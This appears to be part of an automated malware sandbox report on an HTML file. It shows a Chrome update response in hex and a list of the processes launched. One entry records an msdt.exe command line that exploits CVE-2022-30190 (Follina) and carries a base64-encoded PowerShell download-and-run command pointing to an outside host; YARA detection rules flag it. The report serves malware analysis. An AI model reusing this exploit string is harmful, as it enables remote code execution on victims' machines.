                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                Accept-Ranges: none
                                                                Vary: Accept-Encoding
                                                                Connection: close
                                                                Transfer-Encoding: chunked
                                                                2022-06-03 09:10:17 UTC3INData Raw: 33 36 63 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 36 33 32 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 37 38 31 37 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 20
                                                                Data Ascii: 36c<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5632" elapsed_seconds="7817"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                2022-06-03 09:10:17 UTC4INData Raw: 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 61 70 70 20
                                                                Data Ascii: kkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app><app
                                                                2022-06-03 09:10:17 UTC4INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:11:10:12
                                                                Start date:03/06/2022
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\1.html
                                                                Imagebase:0x7ff7964c0000
                                                                File size:2150896 bytes
                                                                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Target ID:1
                                                                Start time:11:10:14
                                                                Start date:03/06/2022
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,1405708065703177602,11307067424223587467,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
                                                                Imagebase:0x7ff7964c0000
                                                                File size:2150896 bytes
                                                                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Target ID:12
                                                                Start time:11:10:40
                                                                Start date:03/06/2022
                                                                Path:C:\Windows\System32\msdt.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
                                                                Imagebase:0x7ff689c20000
                                                                File size:1560576 bytes
                                                                MD5 hash:8BE43BAF1F37DA5AB31A53CA1C07EE0C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 0000000C.00000002.666871221.000001DED42A4000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 0000000C.00000002.666068572.000001DED4010000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                Reputation:moderate

                                                                Target ID:26
                                                                Start time:11:11:46
                                                                Start date:03/06/2022
                                                                Path:C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
                                                                Imagebase:0x7ff602ad0000
                                                                File size:1322992 bytes
                                                                MD5 hash:AFD137B53BA091ACBA569255B16DF837
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                Target ID:27
                                                                Start time:11:11:48
                                                                Start date:03/06/2022
                                                                Path:C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=85.0.4183.121 --sessionid={f7fe8069-977f-4b29-a967-696bc617f281} --system
                                                                Imagebase:0x7ff7748d0000
                                                                File size:259472 bytes
                                                                MD5 hash:49AC3C96D270702A27B4895E4CE1F42A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 0%, Virustotal, Browse
                                                                • Detection: 0%, Metadefender, Browse
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate

                                                                No disassembly